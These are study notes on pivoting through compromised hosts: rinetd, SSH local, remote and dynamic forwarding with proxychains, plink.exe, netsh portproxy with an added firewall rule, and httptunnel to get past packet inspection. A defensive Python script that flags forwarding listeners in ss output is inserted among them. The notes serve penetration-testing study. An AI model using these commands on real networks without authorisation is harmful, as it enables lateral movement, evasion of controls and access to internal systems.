Port Redirection and Tunneling

Carry a protocol over an incompatible delivery network, or provide a secure route through an untrusted network.

Port Forwarding

Redirect traffic from one IP and port to another IP and port.

Scenario

The Linux Web Server is compromised and we have root privileges. The Linux Client is also compromised and we have obtained SSH credentials for it (i.e. we are connected to the Linux Client via two layers of SSH).

The Linux Client is not connected to the internet, but it is connected to the Linux Web Server on the internal network.

We now need to transfer data to and from the Linux Client.

What we can do is redirect traffic arriving on port 80 of the Web Server out to the internet, so the Linux Client can reach the internet through the Web Server.

RINETD

sudo apt update && sudo apt install rinetd
sudo leafpad /etc/rinetd.conf
# add the following
# bindaddress bindport connectaddress connectport
0.0.0.0 80 216.58.207.142 80

sudo service rinetd restart
ss -antp | grep "80" # confirm that rinetd is listening on port 80

# from the compromised machine, connect to port 80 of the attacker machine
nc -nvv <IP> 80

What this does: whenever the rinetd host receives a connection on port 80, it is always forwarded to the configured connect address and port.

SSH Tunneling

SSH can create encrypted tunnels inside the SSH protocol.

Scenario

There are 3 machines in total: attacker machine A; compromised machine B (the Linux Client), which is connected to the internet with only ports 22 and 8080 exposed; and machine C (Windows), which is reachable from B but only has access to the local network.

We want to transfer data.

B redirects requests to C via SSH.

SSH Local Port Forwarding

Tunnel a local port to a remote server.

sudo ssh -N -L 0.0.0.0:445:<target IP>:445 <username>@<IP>	# run this on the attacker machine
# -N: do not execute a remote command, just hold the tunnel open
# -L: local port forwarding; bind port 445 on all local interfaces (0.0.0.0) and forward it through the SSH server to port 445 on <target IP>
# username and IP are those of the compromised machine (the intermediate pivot, B)

Change the Samba setting so the minimum SMB protocol version is SMB2:

min protocol = SMB2	# in /etc/samba/smb.conf, [global] section

List the Windows shares

# on the compromised Linux client
smbclient -L 127.0.0.1 -U Administrator

All traffic sent to that local port is redirected to the Windows machine.

SSH Remote Port Forwarding

The reverse of SSH local port forwarding: the listening port is opened on the remote (attacker) side.

ssh -N -R [bind_address:]port:host:hostport [username@address]
# example
ssh -N -R <attacker ip>:2221:127.0.0.1:3306 kali@<attacker ip>

bind_address is the attacker's IP address.

-R opens a port (say 2221) for listening on the attacker machine.

Requests to the attacker machine's port 2221 are forwarded to the Linux Client, and from there to the SQL server running on that Linux Client.

Check the listening port on the attacker machine

ss -antp | grep "2221"

Flow: on the attacker machine => send a request to 127.0.0.1 port 2221 => the request is redirected through the SSH tunnel to port 3306 on the Linux Client.

# on attacker
sudo nmap -sS -sV 127.0.0.1 -p 2221

SSH Dynamic Port Forwarding

Similar to SSH local port forwarding, but the local listener is a SOCKS proxy.

No need to create a tunnel for every port or every target IP in the network.

# on attacker machine
ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address> # -D for dynamic port forwarding

Redirects any traffic sent to localhost:8080 into the target network.

<username>@<SSH server address> are those of the compromised Linux client.

We need to tell the tools how to reach the proxy, using proxychains.

sudo leafpad /etc/proxychains.conf

Add the SOCKS4 proxy to it:

socks4 127.0.0.1 8080

proxychains nmap --top-ports=20 -sT -Pn <IP>
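Each forwarder above (rinetd, and ssh -L, -D and -R) leaves a listening socket on the pivot host that `ss -antp` shows, which is also what a defender reviewing that host looks for. As an added example, not part of the original notes, this Python script parses a constructed `ss -antp` sample (process names, PIDs and ports are made up) and flags listeners held by rinetd, by an ssh client (-L/-D), or by sshd on a port other than its normal service port (-R).

```python
import re
from collections import namedtuple

# Constructed `ss -antp` sample (not a real capture): rinetd on 80, an ssh -L
# listener on 445, an ssh -D SOCKS listener on 8080, an sshd-held -R endpoint
# on 2221, the normal sshd on 22 and one established session.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:80          0.0.0.0:*         users:(("rinetd",pid=1204,fd=3))
LISTEN 0      128    0.0.0.0:445         0.0.0.0:*         users:(("ssh",pid=1337,fd=5))
LISTEN 0      128    127.0.0.1:8080      0.0.0.0:*         users:(("ssh",pid=1338,fd=4))
LISTEN 0      128    127.0.0.1:2221      0.0.0.0:*         users:(("sshd",pid=2001,fd=9))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=801,fd=3))
ESTAB  0      0      10.11.0.128:22      10.11.0.4:51022   users:(("sshd",pid=2001,fd=4))
"""

# One ss row: state, two queue counters, local addr:port, peer, first process.
ROW_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+\S+\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)
WILDCARD_BINDS = {"0.0.0.0", "*", "[::]", "::"}

# wildcard=True means the listener is reachable from other hosts, not just loopback
Finding = namedtuple("Finding", "pid process bind port reason wildcard")

def find_forwarders(ss_output, expected_sshd_ports=(22,)):
    """Return listening sockets that look like port-forwarding endpoints."""
    findings = []
    for line in ss_output.splitlines():
        m = ROW_RE.match(line)
        if not m or m["state"] != "LISTEN":
            continue
        proc, port, bind = m["proc"], int(m["lport"]), m["laddr"]
        if proc == "ssh":
            reason = "ssh client holding a listener: -L or -D forward"
        elif proc == "sshd" and port not in expected_sshd_ports:
            reason = "sshd listening off its service port: -R forward endpoint"
        elif proc == "rinetd":
            reason = "rinetd redirector"
        else:
            continue  # ordinary service listener
        findings.append(Finding(int(m["pid"]), proc, bind, port, reason,
                                bind in WILDCARD_BINDS))
    return findings

if __name__ == "__main__":
    for f in find_forwarders(SAMPLE_SS_OUTPUT):
        flag = "  [exposed on all interfaces]" if f.wildcard else ""
        print(f"pid {f.pid:>5} {f.process:<7} {f.bind}:{f.port}  {f.reason}{flag}")
```

On a real host, feed it `ss -antp` output captured with root privileges, since the process column is only populated for sockets the caller may inspect.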

PLINK.exe

A Windows SSH client.

Used for pivoting from a Windows machine.

Download the tool onto the Windows machine via an FTP server.

cmd.exe /c echo y | plink.exe -ssh -l kali -pw <pwd> -R <attacker ip>:1234:127.0.0.1:3360 <attacker ip>	# "echo y" accepts the host key prompt

Scan target from attacker

sudo nmap -sS -sV 127.0.0.1 -p 1234

NETSH

A Windows built-in tool.

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=<attacker ip> connectport=445 connectaddress=<target ip>

Open port 4455 for inbound traffic on the Windows machine with netsh:

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<attacker ip> localport=4455 action=allow

On the attacker machine, configure Samba to use SMB2 as the minimum protocol (see above), then list the shares through the redirected port:

smbclient -L <attacker ip> --port=4455 --user=Administrator

HTTP Tunneling Through Deep Packet Inspection

Use the HTTP protocol for tunnelling, so the traffic passes an inspection device that only allows HTTP.

apt-cache search httptunnel

Use httptunnel to encapsulate arbitrary traffic within HTTP requests (an HTTP tunnel).

httptunnel uses a client-server model: hts is the server side, htc the client side.

sudo apt install httptunnel

hts --forward-port localhost:8888 1234	# server: listen for HTTP on 1234, unwrap the traffic and forward it to localhost:8888
htc --forward-port 8080 10.11.0.128:1234	# client: listen on local 8080, wrap the traffic in HTTP and send it to the hts at 10.11.0.128:1234